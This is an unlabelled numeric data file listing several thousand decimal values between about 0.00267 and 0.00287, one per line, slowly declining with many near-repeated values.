0.00286887
0.00286876
0.00286391
0.00286875
0.00286377
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00285834
0.00285848
0.00285351
0.00285337
0.00285846
0.00285835
0.00285335
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286887
0.00286876
0.00286875
0.00286391
0.00286377
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00284298
0.00284807
0.00284796
0.00284316
0.00284796
0.00284313
0.00284299
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283772
0.00283278
0.00283264
0.0028377
0.0028376
0.00283263
0.00284298
0.00284807
0.00284796
0.00284316
0.00284796
0.00284313
0.00284299
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283773
0.00283278
0.00283264
0.0028377
0.0028376
0.00283263
0.00286375
0.00285833
0.00286375
0.00285833
0.00284303
0.00284791
0.00284791
0.00284803
0.00284292
0.00284292
0.00283769
0.00283293
0.00283768
0.00283267
0.00283283
0.00283774
0.00283759
0.00283769
0.00283293
0.00283768
0.00283267
0.00283283
0.00283774
0.00283759
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284328
0.00284302
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284328
0.00284302
0.00283766
0.00283257
0.00283257
0.00283268
0.00283755
0.00283755
0.00283758
0.00284298
0.00283758
0.00284297
0.00282229
0.00281692
0.00282229
0.00281692
0.002817
0.00281194
0.00281194
0.00281689
0.00281689
0.00281203
0.0028225
0.0028274
0.00282725
0.00282241
0.00282735
0.00282234
0.00282259
0.0028225
0.0028274
0.00282725
0.00282241
0.00282735
0.00282234
0.00282259
0.00282234
0.00282721
0.00282721
0.00282732
0.00282224
0.00282224
0.00281703
0.00281203
0.00281701
0.00281228
0.00281693
0.00281219
0.00281708
0.00281703
0.00281203
0.00281701
0.00281228
0.00281693
0.00281219
0.00281708
0.00279636
0.0028017
0.00279636
0.0028017
0.00280175
0.0028066
0.0028066
0.0028067
0.00280165
0.00280165
0.00279645
0.00279173
0.00279644
0.00279148
0.00279636
0.0027965
0.00279163
0.00279645
0.00279173
0.00279644
0.00279148
0.00279636
0.0027965
0.00279163
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280174
0.00280199
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280174
0.00280199
0.00279643
0.00279139
0.00279139
0.00279633
0.00279633
0.00279148
0.00281694
0.00281706
0.002812
0.00281214
0.00281694
0.00281704
0.00281199
0.00282227
0.00282734
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282726
0.00282736
0.00282231
0.00282725
0.00282245
0.00281691
0.00281207
0.00281696
0.00281702
0.00281196
0.00280171
0.00280665
0.00280674
0.00280188
0.00280664
0.00280172
0.00280185
0.00279635
0.00279639
0.00279152
0.00279142
0.00279644
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279145
0.00279159
0.00279144
0.00279637
0.00279647
0.00280171
0.00280665
0.00280674
0.00280188
0.00280664
0.00280172
0.00280185
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279145
0.00279158
0.00279637
0.00279647
0.00279144
0.002817
0.00281194
0.00281194
0.00281689
0.00281689
0.00281203
0.0028225
0.0028274
0.00282725
0.00282241
0.00282234
0.00282735
0.00282259
0.0028225
0.0028274
0.00282725
0.00282241
0.00282259
0.00282735
0.00282234
0.00282234
0.00282721
0.00282721
0.00282224
0.00282732
0.00282224
0.00281703
0.00281203
0.00281701
0.00281228
0.00281693
0.00281708
0.00281219
0.00281703
0.00281203
0.00281701
0.00281228
0.00281708
0.00281693
0.00281219
0.00282229
0.00281692
0.00279635
0.0028017
0.00280175
0.0028066
0.0028066
0.0028067
0.00280165
0.00280165
0.00279645
0.00279173
0.00279644
0.00279148
0.0027965
0.00279636
0.00279163
0.00279645
0.00279173
0.00279644
0.00279148
0.00279636
0.0027965
0.00279163
0.0028019
0.00280663
0.00280678
0.00280181
0.00280199
0.00280673
0.00280174
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280174
0.00280199
0.00279643
0.00279139
0.00279139
0.00279633
0.00279633
0.00279148
0.00279635
0.0028017
0.00281694
0.00281706
0.002812
0.00281214
0.00281694
0.00281704
0.00281199
0.00282227
0.00282733
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282726
0.00282736
0.00282231
0.00282725
0.00282245
0.00281691
0.00281207
0.00281696
0.00281701
0.00281197
0.00280171
0.00280674
0.00280665
0.00280188
0.00280664
0.00280185
0.00280172
0.00279635
0.00279639
0.00279152
0.00279142
0.00279644
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279158
0.00279145
0.00279144
0.00279647
0.00279637
0.00280171
0.00280665
0.00280674
0.00280188
0.00280664
0.00280172
0.00280185
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279145
0.00279158
0.00279637
0.00279647
0.00279144
0.00281694
0.00281706
0.00281214
0.002812
0.00281704
0.00281694
0.00281199
0.00282227
0.00282734
0.00282235
0.00282238
0.00282723
0.0028223
0.00282248
0.00282736
0.00282726
0.00282245
0.00282725
0.00282231
0.00281691
0.00281207
0.00281696
0.00281702
0.00281196
0.00281694
0.00281706
0.002812
0.00281214
0.00281694
0.00281704
0.00281199
0.00282227
0.00282734
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282726
0.00282736
0.00282725
0.00282231
0.00282245
0.00281691
0.00281207
0.00281696
0.00281702
0.00281196
0.00280171
0.00280674
0.00280664
0.00280188
0.00280664
0.00280185
0.00280172
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279158
0.00279145
0.00279647
0.00279637
0.00279144
0.00280171
0.00280664
0.00280674
0.00280188
0.00280664
0.00280172
0.00280185
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279145
0.00279158
0.00279637
0.00279647
0.00279144
0.002817
0.00281194
0.00281194
0.00281689
0.00281689
0.00281203
0.0028225
0.0028274
0.00282725
0.00282241
0.00282234
0.00282735
0.00282259
0.0028225
0.0028274
0.00282725
0.00282241
0.00282259
0.00282735
0.00282234
0.00282234
0.00282721
0.00282721
0.00282224
0.00282732
0.00282224
0.00281703
0.00281203
0.00281701
0.00281228
0.00281693
0.00281708
0.00281219
0.00281703
0.00281203
0.00281701
0.00281228
0.00281708
0.00281693
0.00281219
0.00282229
0.00281692
0.00279635
0.0028017
0.00280175
0.0028066
0.0028066
0.0028067
0.00280165
0.00280165
0.00279645
0.00279173
0.00279644
0.00279148
0.0027965
0.00279636
0.00279163
0.00279645
0.00279173
0.00279644
0.00279148
0.00279636
0.0027965
0.00279163
0.0028019
0.00280663
0.00280678
0.00280181
0.00280199
0.00280673
0.00280174
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280174
0.00280199
0.00279643
0.00279139
0.00279139
0.00279633
0.00279633
0.00279148
0.00279636
0.0028017
0.00281694
0.00281706
0.00281214
0.002812
0.00281704
0.00281694
0.00281199
0.00282227
0.00282734
0.00282235
0.00282238
0.00282723
0.0028223
0.00282248
0.00282736
0.00282726
0.00282245
0.00282725
0.00282231
0.00281691
0.00281207
0.00281696
0.00281702
0.00281196
0.00281694
0.00281706
0.00281214
0.002812
0.00281704
0.00281694
0.00281199
0.00282227
0.00282734
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282736
0.00282726
0.00282725
0.00282245
0.00282231
0.00281691
0.00281207
0.00281696
0.00281702
0.00281196
0.00280171
0.00280674
0.00280665
0.00280188
0.00280664
0.00280185
0.00280172
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279158
0.00279145
0.00279647
0.00279637
0.00279144
0.00280171
0.00280674
0.00280664
0.00280188
0.00280664
0.00280185
0.00280172
0.00279635
0.00279639
0.00279152
0.00279644
0.00279142
0.00280168
0.00280672
0.00280175
0.00280662
0.00280178
0.00279637
0.00279649
0.00279158
0.00279145
0.00279647
0.00279637
0.00279144
0.00282229
0.00281692
0.00282229
0.00281692
0.00280174
0.0028066
0.0028066
0.0028067
0.00280165
0.00280165
0.00279645
0.00279173
0.00279644
0.00279148
0.00279163
0.0027965
0.00279636
0.00279645
0.00279173
0.00279644
0.00279148
0.00279163
0.0027965
0.00279636
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280199
0.00280174
0.0028019
0.00280663
0.00280678
0.00280181
0.00280673
0.00280199
0.00280174
0.00279643
0.00279139
0.00279139
0.00279148
0.00279632
0.00279632
0.00279635
0.0028017
0.00279635
0.0028017
0.00278119
0.00277587
0.00278119
0.00277587
0.00277594
0.00277093
0.00277092
0.00277584
0.00277584
0.00277101
0.00278139
0.00278625
0.0027861
0.0027813
0.0027862
0.00278124
0.00278148
0.00278138
0.00278625
0.0027861
0.0027813
0.0027862
0.00278124
0.00278148
0.00278124
0.00278607
0.00278607
0.00278618
0.00278115
0.00278115
0.00277596
0.00277101
0.00277595
0.00277126
0.00277587
0.00277116
0.00277601
0.00277596
0.00277101
0.00277595
0.00277126
0.00277587
0.00277116
0.00277601
0.00275547
0.00276077
0.00275547
0.00276077
0.00276081
0.00276563
0.00276563
0.00276573
0.00276072
0.00276072
0.00275555
0.00275087
0.00275554
0.00275063
0.00275547
0.0027556
0.00275077
0.00275555
0.00275087
0.00275554
0.00275063
0.00275547
0.0027556
0.00275077
0.00276096
0.00276566
0.0027658
0.00276087
0.00276575
0.00276081
0.00276105
0.00276095
0.00276566
0.0027658
0.00276087
0.00276575
0.00276081
0.00276105
0.00275554
0.00275054
0.00275054
0.00275544
0.00275544
0.00275063
0.00277589
0.002776
0.00277099
0.00277112
0.00277589
0.00277598
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278127
0.0027812
0.00278137
0.00278612
0.00278621
0.00278121
0.00278612
0.00278134
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00276078
0.00276568
0.00276577
0.00276094
0.00276568
0.00276079
0.00276091
0.00275547
0.0027555
0.00275067
0.00275058
0.00275556
0.00276076
0.00276575
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275061
0.00275073
0.0027506
0.00275549
0.00275558
0.00276078
0.00276568
0.00276577
0.00276094
0.00276568
0.00276079
0.00276091
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276575
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275061
0.00275073
0.00275549
0.00275558
0.0027506
0.00277594
0.00277092
0.00277092
0.00277584
0.00277584
0.00277101
0.00278138
0.00278624
0.0027861
0.0027813
0.00278123
0.00278619
0.00278148
0.00278138
0.00278624
0.0027861
0.0027813
0.00278148
0.00278619
0.00278123
0.00278124
0.00278607
0.00278607
0.00278114
0.00278617
0.00278114
0.00277596
0.00277101
0.00277595
0.00277126
0.00277587
0.00277601
0.00277116
0.00277596
0.00277101
0.00277595
0.00277126
0.00277601
0.00277587
0.00277116
0.00278119
0.00277587
0.00275548
0.00276077
0.00276081
0.00276563
0.00276563
0.00276573
0.00276072
0.00276072
0.00275555
0.00275087
0.00275555
0.00275063
0.0027556
0.00275547
0.00275077
0.00275555
0.00275087
0.00275554
0.00275062
0.00275547
0.0027556
0.00275077
0.00276095
0.00276566
0.0027658
0.00276087
0.00276105
0.00276575
0.00276081
0.00276095
0.00276566
0.00276579
0.00276087
0.00276575
0.00276081
0.00276105
0.00275554
0.00275054
0.00275054
0.00275545
0.00275544
0.00275063
0.00275547
0.00276077
0.00277589
0.002776
0.00277099
0.00277112
0.00277589
0.00277598
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278127
0.0027812
0.00278137
0.00278612
0.00278621
0.00278121
0.00278612
0.00278134
0.00277587
0.00277105
0.00277591
0.00277596
0.00277096
0.00276078
0.00276577
0.00276568
0.00276094
0.00276568
0.00276091
0.00276079
0.00275547
0.0027555
0.00275066
0.00275058
0.00275555
0.00276076
0.00276575
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275073
0.00275061
0.0027506
0.00275558
0.00275549
0.00276078
0.00276568
0.00276577
0.00276094
0.00276568
0.00276079
0.00276091
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276574
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275061
0.00275073
0.00275549
0.00275558
0.0027506
0.00277589
0.002776
0.00277112
0.00277099
0.00277598
0.00277589
0.00277098
0.00278118
0.00278619
0.00278124
0.00278127
0.0027861
0.0027812
0.00278137
0.00278621
0.00278612
0.00278134
0.00278612
0.00278121
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00277589
0.002776
0.00277099
0.00277111
0.00277589
0.00277598
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278127
0.0027812
0.00278137
0.00278612
0.00278621
0.00278612
0.00278121
0.00278134
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00276078
0.00276577
0.00276568
0.00276094
0.00276568
0.00276091
0.00276079
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276574
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275073
0.00275061
0.00275557
0.00275549
0.0027506
0.00276078
0.00276568
0.00276577
0.00276094
0.00276568
0.00276079
0.00276091
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276574
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275061
0.00275073
0.00275549
0.00275557
0.0027506
0.00277594
0.00277092
0.00277092
0.00277584
0.00277584
0.00277101
0.00278138
0.00278624
0.0027861
0.0027813
0.00278123
0.00278619
0.00278148
0.00278138
0.00278624
0.0027861
0.0027813
0.00278148
0.00278619
0.00278123
0.00278124
0.00278607
0.00278607
0.00278115
0.00278618
0.00278115
0.00277596
0.00277101
0.00277595
0.00277126
0.00277587
0.00277601
0.00277116
0.00277596
0.00277101
0.00277595
0.00277126
0.00277601
0.00277587
0.00277116
0.00278119
0.00277587
0.00275547
0.00276077
0.00276081
0.00276563
0.00276563
0.00276573
0.00276072
0.00276072
0.00275555
0.00275087
0.00275554
0.00275062
0.0027556
0.00275547
0.00275077
0.00275555
0.00275087
0.00275554
0.00275063
0.00275547
0.0027556
0.00275077
0.00276095
0.00276566
0.0027658
0.00276087
0.00276105
0.00276575
0.00276081
0.00276095
0.00276566
0.00276579
0.00276087
0.00276575
0.00276081
0.00276105
0.00275554
0.00275054
0.00275054
0.00275544
0.00275544
0.00275063
0.00275547
0.00276077
0.00277589
0.002776
0.00277112
0.00277099
0.00277598
0.00277589
0.00277098
0.00278118
0.00278619
0.00278124
0.00278127
0.0027861
0.0027812
0.00278137
0.00278621
0.00278612
0.00278134
0.00278612
0.00278121
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00277589
0.002776
0.00277111
0.00277099
0.00277598
0.00277589
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278127
0.0027812
0.00278137
0.00278621
0.00278612
0.00278612
0.00278134
0.00278121
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00276078
0.00276577
0.00276568
0.00276094
0.00276568
0.00276091
0.00276079
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276575
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275073
0.00275061
0.00275558
0.00275549
0.0027506
0.00276078
0.00276577
0.00276568
0.00276094
0.00276568
0.00276091
0.00276079
0.00275547
0.0027555
0.00275066
0.00275555
0.00275058
0.00276076
0.00276574
0.00276082
0.00276566
0.00276085
0.00275549
0.0027556
0.00275073
0.00275061
0.00275558
0.00275549
0.0027506
0.00278119
0.00277587
0.00278119
0.00277587
0.00276081
0.00276563
0.00276563
0.00276573
0.00276072
0.00276072
0.00275555
0.00275087
0.00275554
0.00275062
0.00275077
0.0027556
0.00275547
0.00275555
0.00275087
0.00275554
0.00275062
0.00275077
0.0027556
0.00275547
0.00276095
0.00276566
0.00276579
0.00276087
0.00276574
0.00276105
0.00276081
0.00276095
0.00276566
0.00276579
0.00276087
0.00276574
0.00276105
0.00276081
0.00275554
0.00275054
0.00275054
0.00275062
0.00275544
0.00275544
0.00275547
0.00276077
0.00275547
0.00276077
0.00274044
0.00273515
0.00274042
0.00273515
0.00273521
0.00273023
0.00273024
0.00273512
0.00273512
0.00273031
0.0027406
0.00274543
0.0027453
0.00274052
0.00274538
0.00274046
0.0027407
0.0027406
0.00274543
0.0027453
0.00274052
0.00274538
0.00274046
0.0027407
0.00274046
0.00274527
0.00274527
0.00274537
0.00274038
0.00274038
0.00273522
0.00273031
0.00273521
0.00273055
0.00273515
0.00273045
0.00273527
0.00273522
0.00273032
0.00273521
0.00273056
0.00273514
0.00273046
0.00273527
0.0027149
0.00272015
0.0027149
0.00272016
0.00272019
0.00272498
0.00272499
0.00272507
0.00272011
0.00272011
0.00271497
0.00271032
0.00271496
0.00271008
0.00271489
0.00271501
0.00271022
0.00271497
0.00271032
0.00271496
0.00271008
0.0027149
0.00271502
0.00271022
0.00272033
0.00272501
0.00272513
0.00272025
0.00272508
0.00272019
0.00272043
0.00272033
0.00272501
0.00272513
0.00272025
0.00272509
0.00272019
0.00272043
0.00271496
0.00271001
0.00271001
0.00271487
0.00271487
0.00271008
0.00273517
0.00273527
0.0027303
0.00273042
0.00273517
0.00273525
0.00273029
0.00274042
0.00274538
0.00274047
0.0027453
0.0027405
0.00274044
0.00274059
0.00274532
0.0027454
0.00274044
0.00274532
0.00274056
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00272017
0.00272503
0.00272511
0.00272032
0.00272503
0.00272017
0.00272029
0.0027149
0.00271493
0.00271012
0.00271005
0.00271498
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271007
0.00271018
0.00271006
0.00271492
0.002715
0.00272017
0.00272503
0.00272511
0.00272032
0.00272503
0.00272017
0.00272029
0.0027149
0.00271492
0.00271012
0.00271497
0.00271004
0.00272015
0.00272509
0.00272019
0.00272502
0.00272022
0.00271492
0.00271502
0.00271007
0.00271018
0.00271492
0.002715
0.00271006
0.00273521
0.00273024
0.00273023
0.00273513
0.00273512
0.00273032
0.0027406
0.00274542
0.0027453
0.00274052
0.00274046
0.00274538
0.0027407
0.0027406
0.00274542
0.0027453
0.00274052
0.0027407
0.00274538
0.00274046
0.00274046
0.00274527
0.00274527
0.00274038
0.00274536
0.00274038
0.00273522
0.00273032
0.00273521
0.00273055
0.00273515
0.00273527
0.00273046
0.00273522
0.00273031
0.00273521
0.00273055
0.00273527
0.00273514
0.00273045
0.00274042
0.00273515
0.00271489
0.00272014
0.00272018
0.00272498
0.00272498
0.00272507
0.0027201
0.00272011
0.00271496
0.00271031
0.00271495
0.00271008
0.00271501
0.00271489
0.00271021
0.00271497
0.00271032
0.00271496
0.00271008
0.00271489
0.00271501
0.00271021
0.00272032
0.002725
0.00272513
0.00272024
0.00272042
0.00272508
0.00272018
0.00272032
0.00272501
0.00272513
0.00272024
0.00272508
0.00272019
0.00272042
0.00271495
0.00271
0.00271
0.00271487
0.00271487
0.00271008
0.0027149
0.00272015
0.00273517
0.00273527
0.0027303
0.00273042
0.00273517
0.00273525
0.0027303
0.00274042
0.00274538
0.00274047
0.0027453
0.0027405
0.00274044
0.00274059
0.00274532
0.0027454
0.00274044
0.00274532
0.00274056
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00272017
0.00272511
0.00272504
0.00272032
0.00272504
0.00272029
0.00272018
0.00271491
0.00271493
0.00271012
0.00271005
0.00271498
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271018
0.00271007
0.00271007
0.002715
0.00271492
0.00272017
0.00272504
0.00272511
0.00272032
0.00272504
0.00272018
0.00272029
0.00271491
0.00271493
0.00271012
0.00271498
0.00271005
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271007
0.00271018
0.00271492
0.002715
0.00271007
0.00273517
0.00273527
0.00273042
0.0027303
0.00273525
0.00273517
0.00273029
0.00274042
0.00274538
0.00274047
0.0027405
0.0027453
0.00274044
0.00274059
0.0027454
0.00274532
0.00274056
0.00274532
0.00274044
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00273517
0.00273527
0.0027303
0.00273042
0.00273517
0.00273525
0.00273029
0.00274042
0.00274538
0.00274047
0.0027453
0.0027405
0.00274044
0.00274059
0.00274532
0.0027454
0.00274532
0.00274044
0.00274056
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00272017
0.00272511
0.00272503
0.00272032
0.00272503
0.00272029
0.00272018
0.0027149
0.00271493
0.00271012
0.00271498
0.00271005
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271018
0.00271007
0.002715
0.00271492
0.00271006
0.00272017
0.00272503
0.00272511
0.00272032
0.00272503
0.00272018
0.00272029
0.0027149
0.00271493
0.00271012
0.00271498
0.00271005
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271007
0.00271018
0.00271492
0.002715
0.00271007
0.00273521
0.00273024
0.00273024
0.00273512
0.00273512
0.00273032
0.0027406
0.00274543
0.0027453
0.00274052
0.00274046
0.00274538
0.0027407
0.0027406
0.00274543
0.0027453
0.00274052
0.0027407
0.00274538
0.00274046
0.00274046
0.00274527
0.00274527
0.00274038
0.00274536
0.00274038
0.00273522
0.00273032
0.00273521
0.00273056
0.00273514
0.00273527
0.00273046
0.00273522
0.00273032
0.00273521
0.00273056
0.00273527
0.00273514
0.00273046
0.00274042
0.00273515
0.0027149
0.00272016
0.00272019
0.00272499
0.00272499
0.00272508
0.00272011
0.00272011
0.00271497
0.00271032
0.00271496
0.00271008
0.00271502
0.0027149
0.00271022
0.00271497
0.00271032
0.00271496
0.00271008
0.0027149
0.00271502
0.00271022
0.00272033
0.00272501
0.00272513
0.00272025
0.00272043
0.00272509
0.00272019
0.00272033
0.00272501
0.00272513
0.00272025
0.00272509
0.00272019
0.00272043
0.00271496
0.00271001
0.00271001
0.00271488
0.00271488
0.00271008
0.0027149
0.00272016
0.00273517
0.00273527
0.00273042
0.0027303
0.00273525
0.00273517
0.0027303
0.00274042
0.00274538
0.00274047
0.0027405
0.0027453
0.00274044
0.00274059
0.0027454
0.00274532
0.00274056
0.00274532
0.00274044
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00273517
0.00273527
0.00273042
0.0027303
0.00273525
0.00273517
0.00273029
0.00274042
0.00274538
0.00274047
0.0027453
0.0027405
0.00274044
0.00274059
0.0027454
0.00274532
0.00274532
0.00274056
0.00274044
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00272017
0.00272511
0.00272504
0.00272032
0.00272504
0.00272029
0.00272018
0.00271491
0.00271493
0.00271012
0.00271498
0.00271005
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271018
0.00271007
0.002715
0.00271492
0.00271007
0.00272017
0.00272511
0.00272504
0.00272032
0.00272504
0.00272029
0.00272018
0.0027149
0.00271493
0.00271012
0.00271498
0.00271005
0.00272015
0.00272509
0.0027202
0.00272502
0.00272023
0.00271492
0.00271502
0.00271018
0.00271007
0.002715
0.00271492
0.00271007
0.00274042
0.00273515
0.00274042
0.00273515
0.00272019
0.00272499
0.00272499
0.00272507
0.00272011
0.00272011
0.00271497
0.00271032
0.00271496
0.00271008
0.00271022
0.00271501
0.0027149
0.00271497
0.00271032
0.00271496
0.00271008
0.00271022
0.00271502
0.0027149
0.00272033
0.00272501
0.00272513
0.00272025
0.00272509
0.00272043
0.00272019
0.00272033
0.00272501
0.00272513
0.00272025
0.00272509
0.00272043
0.00272019
0.00271496
0.00271001
0.00271001
0.00271008
0.00271487
0.00271487
0.0027149
0.00272015
0.0027149
0.00272015
0.00269996
0.00269472
0.00269996
0.00269472
0.00269478
0.00268984
0.00268984
0.00269471
0.0026947
0.00268991
0.00270013
0.00270491
0.0027048
0.00270005
0.00270487
0.0027
0.00270023
0.00270013
0.00270492
0.0027048
0.00270005
0.00270487
0.00269999
0.00270023
0.00269999
0.00270478
0.00270478
0.00270486
0.00269992
0.00269992
0.00269479
0.00268991
0.00269478
0.00269015
0.00269472
0.00269005
0.00269483
0.00269479
0.00268992
0.00269478
0.00269015
0.00269472
0.00269005
0.00269483
0.00267462
0.00267984
0.00267462
0.00267984
0.00267986
0.00268462
0.00268464
0.00268471
0.00267978
0.00267979
0.00267468
0.00267006
0.00267468
0.00266983
0.00267462
0.00267472
0.00266996
0.00267468
0.00267006
0.00267468
0.00266983
0.00267462
0.00267472
0.00266996
0.00268
0.00268465
0.00268477
0.00267992
0.00268472
0.00267986
0.0026801
0.00268
0.00268466
0.00268477
0.00267992
0.00268472
0.00267987
0.0026801
0.00267468
0.00266977
0.00266976
0.00267461
0.0026746
0.00266983
0.00269475
0.00269484
0.00268991
0.00269002
0.00269475
0.00269482
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.00270482
0.0027049
0.00269998
0.00270483
0.00270009
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00267985
0.00268469
0.00268476
0.00267999
0.00268469
0.00267986
0.00267996
0.00267463
0.00267464
0.00266987
0.0026698
0.00267469
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266983
0.00266993
0.00266982
0.00267465
0.00267471
0.00267986
0.00268469
0.00268476
0.00267999
0.00268469
0.00267986
0.00267996
0.00267463
0.00267464
0.00266986
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267464
0.00267473
0.00266983
0.00266992
0.00267465
0.00267471
0.00266982
0.00269479
0.00268986
0.00268985
0.00269471
0.0026947
0.00268993
0.00270012
0.00270491
0.00270479
0.00270004
0.00269998
0.00270487
0.00270023
0.00270013
0.00270491
0.0027048
0.00270005
0.00270023
0.00270487
0.00269999
0.00269999
0.00270476
0.00270477
0.00269991
0.00270486
0.00269992
0.00269479
0.00268994
0.00269479
0.00269016
0.00269472
0.00269484
0.00269006
0.00269479
0.00268992
0.00269478
0.00269015
0.00269483
0.00269472
0.00269006
0.00269996
0.00269472
0.00267462
0.00267983
0.00267987
0.00268465
0.00268464
0.00268472
0.0026798
0.0026798
0.00267468
0.00267006
0.00267467
0.00266984
0.00267472
0.00267462
0.00266996
0.00267468
0.00267006
0.00267468
0.00266983
0.00267462
0.00267472
0.00266996
0.00268
0.00268466
0.00268477
0.00267992
0.0026801
0.00268473
0.00267987
0.00268
0.00268466
0.00268477
0.00267992
0.00268473
0.00267987
0.0026801
0.00267468
0.00266977
0.00266976
0.0026746
0.0026746
0.00266983
0.00267462
0.00267984
0.00269475
0.00269484
0.00268991
0.00269002
0.00269475
0.00269482
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.00270483
0.0027049
0.00269998
0.00270483
0.00270009
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00267985
0.00268476
0.00268469
0.00267999
0.00268469
0.00267996
0.00267986
0.00267463
0.00267465
0.00266987
0.0026698
0.00267469
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266993
0.00266983
0.00266982
0.00267471
0.00267465
0.00267986
0.00268469
0.00268475
0.00267999
0.00268469
0.00267986
0.00267996
0.00267463
0.00267465
0.00266987
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266983
0.00266993
0.00267465
0.00267471
0.00266982
0.00269475
0.00269484
0.00269002
0.00268991
0.00269482
0.00269475
0.00268991
0.00269996
0.00270488
0.0027
0.00270003
0.00270481
0.00269998
0.00270012
0.0027049
0.00270483
0.00270009
0.00270483
0.00269998
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00269475
0.00269484
0.00268991
0.00269002
0.00269475
0.00269482
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.00270483
0.0027049
0.00270483
0.00269998
0.00270009
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00267985
0.00268476
0.00268469
0.00267999
0.00268469
0.00267996
0.00267986
0.00267463
0.00267464
0.00266987
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266993
0.00266983
0.00267471
0.00267465
0.00266982
0.00267985
0.00268469
0.00268475
0.00267999
0.00268469
0.00267986
0.00267996
0.00267463
0.00267465
0.00266987
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267464
0.00267473
0.00266983
0.00266993
0.00267465
0.00267471
0.00266982
0.00269478
0.00268985
0.00268985
0.0026947
0.0026947
0.00268992
0.00270013
0.00270492
0.0027048
0.00270005
0.00269999
0.00270487
0.00270023
0.00270013
0.00270492
0.0027048
0.00270005
0.00270023
0.00270487
0.00269999
0.00269999
0.00270478
0.00270478
0.00269992
0.00270486
0.00269992
0.00269479
0.00268992
0.00269478
